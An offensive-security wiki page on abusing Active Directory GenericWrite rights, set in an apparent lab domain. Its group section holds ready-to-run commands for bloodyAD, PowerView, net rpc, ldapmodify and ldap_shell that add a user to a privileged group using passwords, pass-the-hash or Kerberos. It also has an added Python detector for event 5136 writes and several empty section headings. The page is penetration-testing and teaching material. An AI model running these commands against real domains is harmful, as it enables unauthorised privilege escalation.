# GenericWrite

## Introduction

In Active Directory, every object (user, group, computer, etc.) is protected by an access control list (ACL) whose entries (ACEs) define which actions each identity may perform. The **GenericWrite** permission acts as a write “master key”: it covers almost every right needed to modify an object's attributes and flags, except those that require special permissions (e.g. resetting passwords).

With **GenericWrite** over a **user**, an attacker can:

* Write to **servicePrincipalNames** and run a targeted Kerberoasting attack.
* **Enable disabled accounts** by modifying `userAccountControl`.
* Set the **DONT\_REQ\_PREAUTH** flag in `userAccountControl`, allowing AS-REP Roasting without pre-authentication.
* Inject certificates into **msDS-KeyCredentialLink** to create “Shadow Credentials” and authenticate via Kerberos PKINIT as that user.

With **GenericWrite** over a **group**, they can add themselves (or any other account) directly to the group, escalating privileges instantly.

And with it over a **computer object**, they can modify the computer's **msDS-KeyCredentialLink** attribute, generating machine Shadow Credentials and authenticating as that computer account via PKINIT.

<div><figure><img src="/files/XP8qamFC8dsko1OM1VBx" alt=""><figcaption><p>GenericWrite over a user</p></figcaption></figure> <figure><img src="/files/dnny5IQWABtY0ejoVkdJ" alt=""><figcaption><p>GenericWrite over a group</p></figcaption></figure></div>

<figure><img src="/files/pmK17MnweeHS1P9KTHjR" alt=""><figcaption></figcaption></figure>

***

## Group

### Add user to a group

In these examples we add the user `targetUser` to the group `targetGroup` through the user `attacker`, who holds the **GenericWrite** privilege over `targetGroup`; this lets us add ourselves or any other user.

#### From Linux

{% code title="bloodyAD" overflow="wrap" %}

```bash
# User/Password Authentication
bloodyAD --host 10.10.10.10 -d domain.htb -u 'attacker' -p 'Password01!' add groupMember 'targetGroup' 'targetUser'

# Pass-the-Hash (PtH) Authentication
bloodyAD --host 10.10.10.10 -d domain.htb -u 'attacker' -H '01e97f85894e06a5ad698f624b9a7ee9' add groupMember 'targetGroup' 'targetUser'

# Kerberos Authentication (.ccache)
bloodyAD --host dc.domain.htb -d domain.htb -k add groupMember 'targetGroup' 'targetUser'
```

{% endcode %}

{% code title="PowerView\.py" overflow="wrap" %}

```powershell
# Authentication
# ---------------------------------------------------------------------------------- #
## User/Password Authentication ##
powerview domain.htb/attacker:'Password01!'@10.10.10.10 --dc-ip 10.10.10.10
## Pass-the-Hash (PtH) Authentication ##
powerview domain.htb/attacker@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10.10
## Kerberos Authentication (.ccache) ##
powerview domain.htb/attacker@dc.domain.htb -k --no-pass --dc-ip 10.10.10.10

# Command to use
Add-DomainGroupMember -Identity 'targetGroup' -Members 'targetUser'
```

{% endcode %}

{% code title="net rpc" overflow="wrap" %}

```bash
# User/Password Authentication
net rpc group ADDMEM 'targetGroup' 'targetUser' -U 'attacker%Password01!' -W domain.htb -I 10.10.10.10

# Pass-the-Hash (PtH) Authentication
net rpc group ADDMEM 'targetGroup' 'targetUser' -U 'attacker%01e97f85894e06a5ad698f624b9a7ee9' --pw-nt-hash -W domain.htb -I 10.10.10.10
```

{% endcode %}

{% code title="pth-net rpc" overflow="wrap" %}

```bash
# User/Password Authentication
pth-net rpc group addmem 'targetGroup' 'targetUser' -U 'attacker%Password01!' -W domain.htb -I 10.10.10.10

# Pass-the-Hash (PtH) Authentication
pth-net rpc group addmem 'targetGroup' 'targetUser' -U 'attacker%01e97f85894e06a5ad698f624b9a7ee9' --pw-nt-hash -W domain.htb -I 10.10.10.10
```

{% endcode %}

{% code title="ldapmodify" overflow="wrap" %}

```bash
# Create add-user-to-group.ldif indicating the DN (of the targetGroup) and the member to add
❯ cat add-user-to-group.ldif
dn: CN=targetGroup,CN=USERS,DC=DOMAIN,DC=HTB
changetype: modify
add: member
member: CN=VICTIM,CN=USERS,DC=DOMAIN,DC=HTB

# Execute command
❯ ldapmodify -x -H ldap://10.10.10.10 -D "CN=attacker,CN=Users,DC=domain,DC=htb" -w 'Password01!' -f add-user-to-group.ldif

# Oneliner alternative method without .ldif
printf 'dn: CN=targetGroup,CN=USERS,DC=domain,DC=htb\nchangetype: modify\nadd: member\nmember: CN=VICTIM,CN=USERS,DC=domain,DC=htb\n' | ldapmodify -x -H ldap://10.10.10.10 -D "CN=attacker,CN=Users,DC=domain,DC=htb" -w 'Password01!'
```

{% endcode %}

{% code title="ldap\_shell" overflow="wrap" %}

```bash
# Authentication
# ---------------------------------------------------------------------------------- #
## User/Password Authentication ##
ldap_shell domain.htb/attacker:'Password01!' -dc-ip 10.10.10.10
## Pass-the-Hash (PtH) Authentication ##
ldap_shell domain.htb/attacker -hashes 'aad3b435b51404eeaad3b435b51404ee:01e97f85894e06a5ad698f624b9a7ee9' -dc-ip 10.10.10.10
## Kerberos Authentication (.ccache) ##
ldap_shell domain.htb/attacker -k -no-pass -dc-host dc.domain.htb -dc-ip 10.10.10.10

# Command to use
add_user_to_group targetUser targetGroup
```

{% endcode %}

***

#### From Windows

{% code title="Windows net command" %}

```powershell
net group 'targetGroup' 'targetUser' /add /domain
```

{% endcode %}

{% code title="bloodyAD.exe" overflow="wrap" %}

```powershell
# User/Password Authentication
.\bloodyAD.exe --host 10.10.10.10 -d domain.htb -u 'attacker' -p 'Password01!' add groupMember 'targetGroup' 'targetUser'

# Pass-the-Hash (PtH) Authentication
.\bloodyAD.exe --host 10.10.10.10 -d domain.htb -u 'attacker' -H '01e97f85894e06a5ad698f624b9a7ee9' add groupMember 'targetGroup' 'targetUser'

# Kerberos Authentication (.ccache)
.\bloodyAD.exe --host dc.domain.htb -d domain.htb -k add groupMember 'targetGroup' 'targetUser'
```

{% endcode %}
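As an added detection-side example (not part of these notes), the following Python triages Windows Security event 5136 ("A directory service object was modified") records and flags the writes described in the Introduction and in this group section: `member`, `servicePrincipalName`, `userAccountControl` and `msDS-KeyCredentialLink`. The `DsChangeEvent` structure, its field names and the sample records are constructed for the example; a real pipeline would feed it from the Security log with directory service change auditing and a SACL on the sensitive objects enabled.

```python
# Added example (not part of the original notes): triage constructed Windows Security event
# 5136 ("A directory service object was modified") records and flag the attribute writes
# that GenericWrite abuse relies on. Field names and sample values below are our own.
from dataclasses import dataclass

# Attributes this page shows being written, mapped to the abuse each enables.
SENSITIVE_ATTRS = {"member": "group membership change",
                   "servicePrincipalName": "targeted Kerberoasting",
                   "userAccountControl": "account enable / AS-REP roasting flag",
                   "msDS-KeyCredentialLink": "Shadow Credentials (PKINIT)"}
UAC_ACCOUNTDISABLE, UAC_DONT_REQ_PREAUTH = 0x0002, 0x400000   # userAccountControl bits

@dataclass
class DsChangeEvent:          # the subset of 5136 fields needed here
    subject: str              # account that performed the write
    object_dn: str            # modified object
    attribute: str            # LDAP display name of the attribute
    value: str                # value added or removed
    op: str                   # "Value Added" or "Value Deleted"

def explain_uac(old: int, new: int) -> list[str]:   # security-relevant UAC transitions
    notes = []
    if old & UAC_ACCOUNTDISABLE and not new & UAC_ACCOUNTDISABLE:
        notes.append("account enabled")
    if not old & UAC_DONT_REQ_PREAUTH and new & UAC_DONT_REQ_PREAUTH:
        notes.append("DONT_REQ_PREAUTH set (AS-REP roastable)")
    return notes

def triage(events: list[DsChangeEvent]) -> list[str]:
    """One alert per sensitive write; 5136 logs a UAC change as a Deleted/Added pair."""
    alerts, uac_old = [], {}
    for e in events:
        reason = SENSITIVE_ATTRS.get(e.attribute)
        if reason is None:
            continue                               # e.g. description: not of interest here
        if e.attribute == "userAccountControl":
            if e.op == "Value Deleted":
                uac_old[e.object_dn] = int(e.value)   # remember the previous value
                continue
            detail = ", ".join(explain_uac(uac_old.get(e.object_dn, 0), int(e.value)))
        else:
            detail = f"{e.op}: {e.value}"
        alerts.append(f"{e.subject} -> {e.object_dn} [{e.attribute}] {detail or 'changed'} ({reason})")
    return alerts

# Constructed sample events mirroring the page's scenario (attacker, targetUser, targetGroup).
USERS = "CN=Users,DC=domain,DC=htb"
SAMPLE_EVENTS = [
    DsChangeEvent("DOMAIN\\attacker", f"CN=targetGroup,{USERS}", "member", f"CN=targetUser,{USERS}", "Value Added"),
    DsChangeEvent("DOMAIN\\attacker", f"CN=targetUser,{USERS}", "description", "helpdesk", "Value Added"),
    DsChangeEvent("DOMAIN\\attacker", f"CN=targetUser,{USERS}", "servicePrincipalName", "HTTP/fake.domain.htb", "Value Added"),
    DsChangeEvent("DOMAIN\\attacker", f"CN=targetUser,{USERS}", "userAccountControl", "514", "Value Deleted"),
    DsChangeEvent("DOMAIN\\attacker", f"CN=targetUser,{USERS}", "userAccountControl", "4194816", "Value Added"),
]
```

Running `triage(SAMPLE_EVENTS)` yields three alerts: the group membership write, the SPN write, and a single decoded `userAccountControl` alert reporting both the account enable and the DONT_REQ_PREAUTH flag (514 = NORMAL_ACCOUNT|ACCOUNTDISABLE, 4194816 = NORMAL_ACCOUNT|DONT_REQ_PREAUTH).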

***

## User

### Enable disabled user

***

### Kerberoasting

***

### AS-REP Roasting

***

### Shadow Credentials

***

### Script path

***

## Computer

### Resource-based Constrained Delegation (RBCD Attack)

## References

{% embed url="<https://www.hackingarticles.in/genericwrite-active-directory-abuse/>" %}

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-acl-ace/#genericallgenericwrite>" %}

{% embed url="<https://books.spartan-cybersec.com/cpad/vulnerabilidades-y-ataques-en-ad/abuso-de-acl/genericwrite-sobre-computador>" %}

{% embed url="<https://bloodhound.specterops.io/resources/edges/generic-write>" %}

{% embed url="<https://github.com/0thm4n3/AD-Red-Team-Hacking-Course/blob/main/45.%20ACL%20-%20GenericWrite%20on%20User>" %}

{% embed url="<https://notes.morph3.blog/abusing-active-directory-acls/genericwrite>" %}

{% embed url="<https://gitee.com/scriptkiddies/hacktricks/blob/master/windows/active-directory-methodology/acl-persistence-abuse.md#abusing-active-directory-aclsaces>" %}

